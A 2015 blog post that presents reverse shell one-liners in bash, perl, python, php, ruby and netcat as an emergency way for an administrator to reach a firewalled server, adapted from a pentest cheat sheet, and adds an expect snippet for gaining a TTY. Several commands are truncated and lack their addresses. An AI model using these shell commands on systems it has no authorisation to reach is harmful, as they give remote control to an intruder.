Emergency reverse shell technique

18 Jun 2015 08:44 | security

Don't you just hate it when an emergency happens with an important server and
access from your location is firewalled?  Luckily if there's someone else local
to the machine who can execute commands for you, getting onto it is fairly

First make sure that the machine you're on can accept connections from the
internet on a TCP port (any).  Typically you'll need to map this through on
whatever firewall/router you've got on the local network.

Let's say your ip address is and you've mapped tcp port 13131.
Simply listen on the port with netcat:

$ nc -l 13131

then have someone on the remote machine run any of these:


bash -i >& /dev/tcp/ 0>&1


perl -e 'use


python -c 'import


php -r '$sock=fsockopen("",13131);exec("/bin/bash -i <&3 >&3


ruby -rsocket -e'f=TCPSocket.open("",13131).to_i;exec
sprintf("/bin/bash -i <&%d >&%d 2>&%d",f,f,f)'


nc -e /bin/bash 13131

and hey presto, your netcat listener is now connected to the shell. Of course
the connection isn't encrypted, so you'll want to be careful what you type over
it, but for emergency use it's quite handy. The advantage over the obvious
choice for this (ssh) is that you don't have to give the person who's at the
server end any credentials to log into your machine with in order to set up the

source: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet


One limitation of this is that you won't have a tty, which makes many things
impossile or difficult.

However if expect is installed you can get one by dropping this into a file and
running it:

# Spawn a shell, then allow the user to interact with it.  The new shell will
# have a good enough TTY to run tools like ssh, su and login
spawn bash interact

then you have a full tty and can run sudo, su, screen etc :)